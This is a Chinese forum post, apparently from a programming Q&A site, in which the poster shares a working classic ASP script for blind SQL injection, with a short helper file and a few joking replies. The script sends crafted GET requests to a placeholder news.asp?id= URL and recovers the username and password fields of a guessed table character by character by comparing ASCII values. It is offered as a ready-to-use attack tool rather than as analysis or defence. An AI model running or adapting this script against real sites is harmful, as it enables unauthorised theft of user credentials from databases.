闲来无事,玩了玩Sql Injection,数据表名及字段名猜测就不贴了,贴一下直接获得已知表名字段名的数据的过程!
getdata.asp
<!--#include file= "gbutf.asp "-->
<%
Server.ScriptTimeOut = 6000000
function getuid(n,col,getid)
dim rv
rv = "无 "
for i = 0 to 200 '取ASCII码范围,负数(汉字)的没做处理;
dim urlpath 'http://www.xxxxxxxxx.com/news.asp?id=1为要注入的目标地址,[TABLE]为您已经猜测到的表名,where id=为该表的字段id,如果没有,可以更改语句如order by ???
urlpath = "http://www.xxxxxxxxx.com/news.asp?id=1%20or%20(select%20top%201%20asc(mid( "&col& ", "&n& ",1))%20from%20[TABLE]%20where%20id= "&getid& ")= "&i& " "
With xmlhttp
.Open "GET ",urlpath,False
.Send
End With
If xmlhttp.Status = 200 Then
dim result
result = xmlhttp.responseBody
result = BytesToBstr(result, "GB2312 ")
If instr(result, "错误信息 ") > = 0 then '这里的错误信息设定为实际页面上的错误信息
rv = chr(i)
Exit For
end if
End if
next
If rv <> "无 " then
Response.write rv
If n <15 then '假设字段长度为15,如果实际更长就改大,否则就缩小,加快速度;
getuid int(n+1),col,getid
end if
end if
end function
dim xmlhttp
Set xmlhttp = Server.CreateObject( "MSXML2.XMLHTTP ")
'getuid函数参数意义
'参数1:从第一位开始取;
'参数2:要获取数据的字段名;
'参数3:指定的数据编号,如id=1的记录
getuid 1, "username ",1
response.write " : "
getuid 1, "password ",1
Set xmlhttp = Nothing
%>
gbutf.asp
<%
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject( "adodb.stream ")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
更多请参见:
http://blog.csdn.net/dh20156/archive/2007/04/03/1550639.aspx
------解决方案--------------------
信 誉 值: 4
狂汗ing...........
------解决方案--------------------
LZ的RP貌似很WX?
------解决方案--------------------
hehe,用asp做的很容易再实际中不稳定死掉
而且sql inject的情况很多 字符 数字 搜索 嘻嘻